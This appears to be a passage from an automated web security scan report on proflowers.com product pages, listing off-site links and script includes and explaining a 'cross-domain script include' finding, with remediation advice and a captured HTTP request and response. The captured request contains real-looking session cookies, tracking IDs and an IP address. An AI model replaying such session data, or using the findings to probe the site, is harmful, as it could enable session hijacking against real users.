<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a id="productDetailBody_ctl09__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="productDetailBody_ctl09_ctl91__repeater_ctl00__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
Body_ctl09_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="ProductInfoImage">
                           <img id="productDetailBody_productImage" class="productimagedimension" border="0" prvdid="productImage" RenderDivWhenInvisible="true" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=300&amp;hei=350" style="height:350px;width:300px;border-width:0px;" />
                       </div>
...[SNIP]...
<div id="productDetailBody_FlynnMagazeeny_divPicture" class="magPicture"> <img id="productDetailBody_FlynnMagazeeny_imgPicture" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/NTR_PD_Body_PFC_FLN_50_67_ReadersDigest_TB.gif" style="border-width:0px;" /> </div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shUpgradesHeader_image" class="Step_1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shMainAccessorySelectionHeader_image" class="Step_2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00__productImage" prvdid="productimage" class="selectedImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shZipCodeHeader_image" class="Step_4" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shDeliveryDateSelectionHeader_image" class="Step_3" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl00__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Today</a>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl01__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Sunday</a>
...[SNIP]...
<td align="left" valign="top" style="width:28px;"><img id="productDetailBody_deliveryCalendar_Image1" class="calendar_button" prvdid="calendar_button" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/icon_Calendar_DeliveryTime.gif" src="" style="border-width:0px;margin-left:5px; cursor:pointer;" /></td>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl00__pcHyperLink" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Today</a>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl01__pcHyperLink" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Sunday</a>
...[SNIP]...
<div class="AccessoryImages">
       <img id="productDetailBody_accPreview_Repeater1_ctl00_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />
<img id="productDetailBody_accPreview_Repeater1_ctl01_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />
<img id="productDetailBody_accPreview_Repeater1_ctl02_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />

   </div>
...[SNIP]...
3" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=6&amp;trackingpgroup=YMA&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Hugs and Kisses" style="border-width:0px;" /></a>
...[SNIP]...
href="http://products.proflowers.com/flowers/Mardi-Gras-Orchid-Garden-42864?viewpos=6&amp;trackingpgroup=YMA&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Mardi Gras Orchid Garden" style="border-width:0px;" /></a>
...[SNIP]...
ducts.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?viewpos=6&amp;trackingpgroup=RecentlyViewed&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Mother...s Day Bouquet" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"><img id="productDetailBody_PCImage1" class="Ribbon25Mil" text="25 Million Orders Shipped" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
"text" value="Enter Your Email Here" id="productDetailBody_footer_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
</div><img class="shopOurBrandFamily" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" style="height:20px;width:181px;border-width:0px;" /> <br />
...[SNIP]...
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." style="border-width:0px;" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a> <a title="Unique personalized gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
